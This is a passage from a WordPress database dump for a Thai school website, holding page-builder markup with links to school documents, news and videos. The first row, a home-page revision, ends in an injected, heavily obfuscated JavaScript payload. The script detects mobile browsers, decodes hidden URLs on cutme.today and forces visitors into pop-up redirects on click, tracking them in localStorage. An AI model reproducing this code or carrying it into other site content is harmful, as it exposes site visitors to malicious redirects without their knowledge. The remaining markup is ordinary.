)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-29 10:38:37','2024-08-29 03:38:37','',19,'http://watprato.ssk.in.th/?p=259',0,'revision','',0),
(260,2,'2024-08-29 12:02:41','2024-08-29 05:02:41','','O27','','inherit','open','closed','','o27','','','2024-08-29 12:02:41','2024-08-29 05:02:41','',19,'http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27.jpg',0,'attachment','image/jpeg',0),
(261,2,'2024-08-29 12:03:06','2024-08-29 05:03:06','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 